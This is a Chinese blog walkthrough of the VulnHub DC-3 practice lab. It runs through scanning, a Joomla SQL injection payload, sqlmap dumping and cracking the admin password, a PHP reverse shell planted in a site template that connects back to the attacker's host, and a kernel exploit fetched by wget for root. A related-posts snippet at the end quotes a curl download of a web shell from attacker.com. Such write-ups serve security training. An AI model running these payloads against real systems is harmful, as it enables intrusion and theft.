DC-3靶场实战详解

最新推荐文章于 2024-03-27 20:01:53 发布
最新推荐文章于 2024-03-27 20:01:53 发布
阅读量9.1k 收藏 34
点赞数 5
分类专栏: DC 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a310034188/article/details/122709729
版权

环境安装

前面安装了老版本的DC-3几次,nmap都扫描不到机器,后来琢磨了很久也找不到问题,然后我去官网重新下载了个就没问题了

官网地址:https://www.vulnhub.com/entry/dc-32,312/

KALI和DC-3都用NAT模式.

image-20220126111501966

DC-3需要多修改一些东西

把IDE里面的改成IDE 0:0

image-20220126111733346

都完成后开启KALI与DC-3

寻找FLAG

信息收集

1.首先确认kali与DC-3所在网段

ip add

image-20220126112423509

确认kali与DC-3所在网段为192.168.79.0/24网段

2.查找DC-3 ip 可以使用nmap 或者 arp-scan

方法一:
	arp-scan -l
方法二:
    nmap -sP 192.168.79.0/24

image-20220126112722328

image-20220126112652973

最终可以确认

kali :192.168.79.128

DC-3 :192.168.79.131

  1. 扫描DC-3开启的服务
nmap -v -A 192.168.79.131

image-20220126124409319

image-20220126124513610

通过扫描可以发现 DC-3开启了80端口 并且使用了Joomla! cms

4.访问网站192.168.79.131

5.扫描敏感目录看看

我这里使用的是7kbscan-WebPathBrute.1.6.2用御剑也是一样的

image-20220126125439174

image-20220126125421935

找到后台登录网站。

因为是常见的cms,所以我们直接扫Joomla! cms常见漏洞

漏洞扫描

1.安装onlinetool(在线cms识别|信息泄露|工控|系统|物联网安全|cms漏洞扫描|nmap端口扫描|子域名获取 在线工具安装)

地址 https://github.com/iceyhexman/onlinetools

我们这里kali 192.168.79.128 安教程部署就可以了

git clone https://github.com/iceyhexman/onlinetools.git
cd onlinetools
pip3 install -r requirements.txt
nohup python3 main.py &

2.安装完成后访问 http://192.168.79.128:8000/

image-20220126130011338

3.使用里面cms漏洞扫描

image-20220126130044512

image-20220126130149793

4.测试payload的有效性

payload:
http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)

image-20220126130303660

确认payload有效

5.既然是SQL注入漏洞 配合sqlmap 以及前面目录爆破出来的后台登录网站,来登录后台

我这里使用是sqlmap windows的版本

python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbs

//*表示注入位置 
//查询所有数据库

image-20220126152329289

image-20220126152506635

得到下面5个数据库 既然是joomla! 那我们也顺其自然的查询joomladb 数据库

python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" --tables
//查joomladb 数据库下面的表

image-20220126152805130

image-20220126152831903

一共有8 90条 有一个#_users 看样子里面就应该有相关后台信息

接下来查询#_users表内的列名

python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" --columns
//查询#_users表内的列名

image-20220126153144402

都是一路y或者回车

image-20220126153328743

确定列名 账号密码一般为“username,password”

获得表中的账号密码

python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" -C "username,password" --dump
//读取指定字段内容

image-20220126153711605

image-20220126153732404

获得账号密码

±---------±-------------------------------------------------------------+
| username | password |
±---------±-------------------------------------------------------------+
| admin | $2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
±---------±-------------------------------------------------------------+

6.密码为md5加密 可以使用kali内的john 解密

创建文件
touch admin.txt   #创建文件
vi admin.txt      #编辑
john admin.txt    #破解

ps:
  因为我以前破解过使用所以显示这个
  	Using default input encoding: UTF-8
	Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
	No password hashes left to crack (see FAQ)
  这是以及破解过的意思
john --show admin.txt  #查看admin.txt以前破解过的结果

image-20220126154137187

得到密码为 :snoopy
  1. 登录后台

image-20220126155138389

反弹shell

通过对后台的各种查询,发现Extensions->Templates里面的模板可以执行PHP脚本

image-20220126155322023

image-20220126155432643

随便找都可以,里面路径都有写

image-20220126155542785

当系统没有禁用proc_popen的时候,我们是可以借助proc_popen轻松反弹这样的一个shell的。
$sock = fsockopen("192.168.79.128", "5555");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);

image-20220126162946897

之后保存访问http://192.168.79.131/index.php

kali内使用nc 接受反弹的shell

nc -lvvp 5555

image-20220126163138366

浏览器访问http://192.168.79.131/index.php

可以发现kali内接收到shell

image-20220126163228079

python -c "import pty;pty.spawn('/bin/bash')"
//使用python 弄交互式页面

image-20220126163400015

发现权限不够

image-20220126163558791

提权

SUID啥的都不行,于是考虑系统漏洞提权

cat /etc/*release		#查看发行版信息

image-20220126173607424

cat /proc/version  #查看内核版本的全部信息

image-20220126174053528

可以判断为Ubuntu 16.04 LTS 内核为Linux 4.4.0-21

查看kali本地漏洞库里面的exp

searchsploit Ubuntu 16.04

image-20220126180522327

对应版本的几个都试了 发现 39772.txt可以

查看exp

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

写了exp地址

image-20220126180702393

本地下载即可

kali好像下载不了 我本地下载 然后拉到kali里面

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

image-20220126180918196

开启apache

systemctl start apache2.service

image-20220126180952210

移动39772.zip到指定的apache的目录下

mv 39772.zip /var/www/html

image-20220126181055139

浏览器访问 kali IP:192.168.79.128

image-20220126181231610

复制下载链接

http://192.168.79.128/39772.zip

回到前面的DC-3的shell中下载刚刚上传的exp

wget http://192.168.79.128/39772.zip

image-20220126181415708

解压exp

unzip 39772.zip			#解压39772.zip
cd 39772				#进入39772
tar -xvf exploit.tar	#解压缩exploit.tar

image-20220126182103895

image-20220126182120869

进入 ebpf_mapfd_doubleput_exploit 运行exp

cd ebpf_mapfd_doubleput_exploit

image-20220126182233268

运行方法 前面kali里面 cat /usr/share/exploitdb/exploits/linux/local/39772.txt 文件内写了

image-20220126182328407

运行compile.sh , doubleput即可

./compile.sh
./doubleput

image-20220126182538031

等一两分钟就可以了

image-20220126182618079

FLAG

root目录下有flag,获得flag

cd /root
cat the-flag.txt

image-20220126182819138

总结

  • nmap,arp-scan主机扫描
  • cms漏洞扫描
  • sql注入漏洞sqlmap配合payload
  • 敏感目录爆破
  • php反弹shell的编写
  • 系统漏洞提权
a310034188
关注
  • 5
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
DC-3靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-27 5065
DC-3靶场渗透过程
靶机DC-3—WP
m0_66638011的博客
05-17 1081
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
DC-7靶场
mlws1900的博客
03-27 868
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
【技术分享】实战dc-3靶场及其技巧讲解
Innocence_0的博客
07-23 205
本期技术文章将与大家分享小星实战dc-3靶场”的经验,通过分析其渗透过程以及不同的getshell方法,与大家共同探讨该靶场的破解技巧。
靶机4 DC-3(过程超详细)
honest_gg的博客
09-26 977
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
vulnhub通关-3 DC-3(含靶场资源)
Brucye
02-07 905
6.网络设置,要与攻击机kali在同一网段,要么都用NAT模式,要么都用桥接模式(我这里用是是NAT模式)链接:https://pan.baidu.com/s/1tJr7V5ZbYMtfCLeOa40r2Q。建议不要使用https源,https更换源需要处理安全问题较为麻烦,我这里直接使用的http源。注意:doublepu.c执行后会生成doublepu 要再次执行doublepu。这款工具是专门对Joomla框架进行扫描的,需要进行下载。3.接下来选择你想导入的路径,进行导入即可。
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
DC-DC变换电路详解
04-12
非常详细的介绍了升降压的过程,以及计算公式,常用的斩波电路等
onlinetools:在线cms识别|信息精度|工控|系统|物联网安全| cms扩展扫描| nmap端口扫描|子域名获取|待续。
03-11
在线工具 这是一个线上工具箱,收集整理了一些渗透测试过程中常见的需求(病句?) 现在已经包含的功能有: 在线cms识别|信息精度|工控|系统|物联网安全| cms扩展扫描| nmap端口扫描|子域名获取 部署方法 git clone https://github.com/iceyhexman/onlinetools.git cd onlinetools pip3 install -r requirements.txt nohup python3 main.py & Docker部署 git clone https://github.com/iceyhexman/onlinetools.git cd onlinetools docker build -t onlinetools . docker run -d -p 8000:8000 onlinetools 浏览器打开 http://loc
DC-3-2靶场渗透测试
qq_41567985的博客
11-21 78
靶场DC-3-2渗透主要是考到了一个中间件和框架的认识,如果认识,懂得去搜索利用,那么这个靶场就会变得很简单。可以知道这个joomla是一个框架并且可以使用joomscan可以扫描这个框架存在的一些漏洞。可以知道这个网站是使用Joomla ,我们可以使用msf去查找这个joomla的版本。因为kali中搜集了很多框架和中间件的漏洞利用exp,我们可以去搜索一下。命令: unzip -o -d /tmp zip //文件解压缩。tar -xf tar文件 //tar文件解压缩。
DC靶场系列--DC1
BGiscool的博客
06-28 4657
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC-1渗透靶场实战速通版
saber的博客
12-01 773
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
DC-3靶机渗透详细教程(附靶机链接)
bwt_D的博客
11-12 5539
靶机链接:https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg 提取码:0na8 首先查看本机kali的ip地址:192.168.159.145 ifconfig 利用nmap扫描靶机IP nmap -sP 192.168.159.1/24 查看靶机mac地址 打开虚拟机设置,点击网络适配器——高级 根据靶机的mac地址匹配nmap的扫描结果确认靶机IP为192.168.159.141 使用nmap进行完整扫描 nmap -A 192.168.159.141
DC3-靶机
Au
08-22 4093
下载地址 这块填一下坑,上面那个链接有两个下载地址,本人是使用VMware虚拟机,下了第一个ova的导入,使用nmap扫,怎么也扫不到存活主机,一直以为是我本地环境的问题,最后没招了,准备重新下一个试试,然后到下载页面一看,作者已经被反馈过这个问题了,又做了一个新的VMware镜像,可以直接使用。 坑啊! 所以使用VMware的同学,下载第二个即可。 配置的环境: kali : 192.16...
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2408
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
内网渗透DC-3靶场通关
qq_35664104的博客
09-23 859
个人博客:点我 DC系列共9个靶场,本次来试玩一下DC-3,只有1个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP kali : 192.168.31.17 win7 : 192.168.31.168 dc-3 : 192.168.31.241 渗透 传统艺能端口扫描 nmap -sV -A -p- 192.168.31.241 cmd为joomla的,
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值